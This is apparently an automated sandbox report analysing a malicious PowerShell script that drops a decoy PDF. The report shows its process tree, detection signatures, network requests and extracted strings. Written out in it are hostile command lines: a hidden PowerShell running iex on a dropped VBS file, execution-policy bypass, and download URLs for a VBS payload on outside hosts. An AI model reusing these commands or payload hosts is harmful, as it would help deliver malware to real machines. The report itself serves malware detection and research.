Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
H6epOhxoPY.ps1

Overview

General Information

Sample name:H6epOhxoPY.ps1
renamed because original name is a hash value
Original sample name:94edb90db4ecf5648a2769b087acdb0323a7521877b6454fc00a6834ce4f76d6.ps1
Analysis ID:1578230
MD5:bd912222bc39017ff4cbf8c37d24d889
SHA1:1a4442b9d56c5b3fb06d38009b5f5d01b7a4a809
SHA256:94edb90db4ecf5648a2769b087acdb0323a7521877b6454fc00a6834ce4f76d6
Tags:185-236-228-9287-120-112-91ps1www-al-rasikh-comuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 3284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 4296 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 4280 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 6552 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1624,i,4563847873640221510,10581209882745739049,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 6764 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3284JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_3284.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3284, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'", ProcessId: 5708, ProcessName: powershell.exe
      Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
      Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3284, TargetFilename: C:\Users\Public\txr.vbs
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1", ProcessId: 3284, ProcessName: powershell.exe
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3284, TargetFilename: C:\Users\Public\txr.vbs
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1", ProcessId: 3284, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6764, ProcessName: svchost.exe

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: H6epOhxoPY.ps1Avira: detected
      Multi AV Scanner detection for submitted file
      Source: H6epOhxoPY.ps1Virustotal: Detection: 44%Perma Link
      Source: H6epOhxoPY.ps1ReversingLabs: Detection: 34%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.8% probability
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.8:49704 version: TLS 1.2
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1554956460.0000011073522000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1554760790.000001107350D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1784611559.000001CA7336F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1682847093.000001CA590C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1781902419.000001CA73110000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 6?ll\System.pdbdir=C: source: powershell.exe, 00000000.00000002.1786312887.000001CA733E2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbgement.Automation.pdb source: powershell.exe, 00000000.00000002.1682847093.000001CA590C2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb/ source: powershell.exe, 00000003.00000002.1553719635.00000110734A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1784611559.000001CA7333C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1553460210.0000011073469000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.1784611559.000001CA7336F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1552154954.00000110733B2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdbW source: powershell.exe, 00000003.00000002.1553719635.00000110734A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb56l source: powershell.exe, 00000003.00000002.1553460210.0000011073469000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 6?t.Automation.pdb& source: powershell.exe, 00000003.00000002.1554229305.00000110734B6000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 203.175.174.69 203.175.174.69
      Source: Joe Sandbox ViewIP Address: 107.161.23.150 107.161.23.150
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global trafficDNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 11:50:46 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000000.00000002.1685887513.000001CA5CBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://astenterprises.com.pk
      Source: powershell.exe, 00000003.00000002.1553460210.0000011073469000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1552470227.00000110733E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
      Source: svchost.exe, 00000008.00000002.2706498999.00000268AD400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: 77EC63BDA74BD0D0E0426DC8F80085060.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.8.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.8.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000003.00000002.1516410513.0000011000902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: powershell.exe, 00000000.00000002.1774876294.000001CA6B17F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1774876294.000001CA6B2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000000.00000002.1685887513.000001CA5B111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011000001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.1685887513.000001CA5CBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.1685887513.000001CA5B342000.00000004.00000800.00020000.00000000.sdmp, H6epOhxoPY.ps1String found in binary or memory: http://www.bluacmmaxxlasacmr.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.1685887513.000001CA5CC94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1685887513.000001CA5CC37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000000.00000002.1685887513.000001CA5CC37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: powershell.exe, 00000000.00000002.1784369442.000001CA73230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coiY
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.7.drString found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000000.00000002.1685887513.000001CA5B111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011000001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011001310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
      Source: powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
      Source: svchost.exe, 00000008.00000003.1632205416.00000268AD210000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
      Source: powershell.exe, 00000003.00000002.1516410513.0000011000228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.1685887513.000001CA5BD42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011000902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1516410513.0000011001310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.1781902419.000001CA7318E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.coB3
      Source: powershell.exe, 00000000.00000002.1774876294.000001CA6B17F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1774876294.000001CA6B2C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1543342514.0000011010070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.1685887513.000001CA5C4D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astacmntacmrprisacms.com.pk/ms/List%20of%20racmquiracmd%20itacmms%20and%20sacmrvicacms.p
      Source: powershell.exe, 00000000.00000002.1685887513.000001CA5C4D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1685887513.000001CA5CBF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000000.00000002.1685887513.000001CA5C4D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List
      Source: powershell.exe, 00000000.00000002.1685887513.000001CA5C4D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.8:49704 version: TLS 1.2
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: classification engineClassification label: mal84.evad.winPS1@20/59@5/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdfJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4068:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xopxzox1.tww.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: H6epOhxoPY.ps1Virustotal: Detection: 44%
      Source: H6epOhxoPY.ps1ReversingLabs: Detection: 34%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\H6epOhxoPY.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1624,i,4563847873640221510,10581209882745739049,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\lvykjh.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1624,i,4563847873640221510,10581209882745739049,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
